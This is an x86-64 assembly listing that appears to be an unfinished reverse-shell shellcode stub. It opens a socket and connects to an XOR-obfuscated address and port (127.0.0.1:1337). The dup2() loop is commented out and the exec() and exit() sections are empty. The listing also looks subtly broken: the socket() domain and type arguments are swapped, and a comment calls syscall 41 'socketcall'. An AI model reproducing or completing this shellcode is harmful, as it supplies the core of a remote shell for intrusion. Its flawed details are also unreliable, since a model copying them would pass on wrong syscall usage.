1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
BITS 64
; socket()
xor rax,rax ; zero out rax (SYSCALL NMB)
xor rdi,rdi ; " " rdi (ARG0)
xor rsi,rsi ; " " rsi (ARG1)
mov rdx,rax ; " " rdx (ARG2)
mov byte al,41 ; socketcall syscall
mov byte dil,0x1 ; SOCKTYPE
mov byte sil,0x2 ; SOCKDOMAIN
syscall
mov rdi,rax
; connect()
xor rax,rax
push rax
push rax
push 0x1011116E ; XOR-encoded -> 127.0.0.1
xor dword [rsp],0x11111111
push word 0x2814 ; push tcp port (XOR-encoded -> 1337)
xor word [rsp],0x1111 ; decode tcp port
push word 0x2 ; 0x2 -> AF_INET
mov rsi,rsp
mov dl,0x10
mov al,42
syscall
; dup2()
;mov rbx,rdi
;xor rdi,rdi
;xor rsi,rsi
;xor rcx,rcx ; zero out count register
;mov cl,0x3 ; loopcount
;dupes:
;xor eax,eax ; zero out eax
;mov al,33 ; dup2() syscall
;dec cl
;mov rdi,rcx
;mov rsi,rbx
;syscall
;inc cl
;loop dupes
; exec()
; exit()
|